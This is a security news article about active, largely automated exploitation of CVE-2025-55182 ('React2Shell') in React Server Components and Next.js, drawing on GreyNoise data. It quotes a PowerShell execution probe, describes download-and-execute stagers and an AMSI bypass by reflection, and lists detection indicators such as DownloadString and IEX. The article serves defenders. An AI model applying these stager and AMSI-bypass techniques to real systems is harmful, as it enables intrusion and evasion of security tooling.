A critical remote code execution vulnerability, tracked as CVE-2025-55182 and dubbed “React2Shell,” is now under active exploitation in the wild.
GreyNoise researchers have detected opportunistic, largely automated exploitation attempts targeting the unsafe deserialization flaw in the React Server Components Flight protocol.
The vulnerability enables unauthenticated remote code execution (RCE) affecting React and downstream ecosystems, including Next.js, prompting urgent calls for immediate patching.
Automated Exploitation Campaign Underway
GreyNoise data shows a common attack pattern where hackers use both new and old systems to run their operations.
The HTTP client and TCP stack fingerprints show overwhelmingly automation-heavy traffic rather than organic browsing behavior.
Researchers have already observed the vulnerability being integrated into Mirai and other botnet exploitation kits, signaling a dangerous evolution in the threat landscape.
Initial access attempts leverage publicly disclosed proof-of-concept code as a foundation.
The attackers employ multi-stage payloads that start with proof-of-execution probes that use PowerShell arithmetic operations to validate remote code execution cheaply.
Subsequent stages deploy encoded PowerShell download-and-execute stagers utilizing reflection to bypass Windows AMSI security by setting System.Management.Automation.AmsiUtils.amsiInitFailed to true.
Technical Attack Chain and Indicators
The exploitation workflow follows a predictable but effective pattern. Attackers first perform basic validation using “cheap math” PowerShell commands, such as “powershell -c ‘40138*41979′”, to confirm command execution and deterministic output.
After successful validation, encoded PowerShell stagers download stage-two payloads that employ lightweight byte-transform obfuscation and AMSI bypass techniques.
Traffic analysis shows the top user agents are Go-http-client/1.1, Assetnote-tagged scanners on Chrome 60, Safari 17.2.1, and smaller volumes from aiohttp and python-requests.
This composition is consistent with standard early exploitation waves featuring a mix of researcher traffic, scanner activity, and spoofed browser strings.
The JA4T and JA4H fingerprint distribution concentrates heavily in ASNs attributed to the Netherlands, China, the United States, and Hong Kong, with nearly 50 percent of observed exploitation IPs first seen in December 2025.
Defenders can leverage GreyNoise Block to immediately block malicious IPs associated with this campaign using the platform’s React Server Components template.
Enterprise customers have access to targeted blocklists that support full queries with ASN specifications, JA4 fingerprints, and destination-country filters.
Endpoint detection should focus on PowerShell process creation combined with encoded commands and suspicious primitives like DownloadString or IEX, along with script blocks containing AMSI bypass indicators.
Organizations must prioritize patching vulnerable React Server Components and Next.js deployments.
While monitoring for repeated PowerShell arithmetic validation attempts across short time windows, which serve as strong exploitation indicators.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
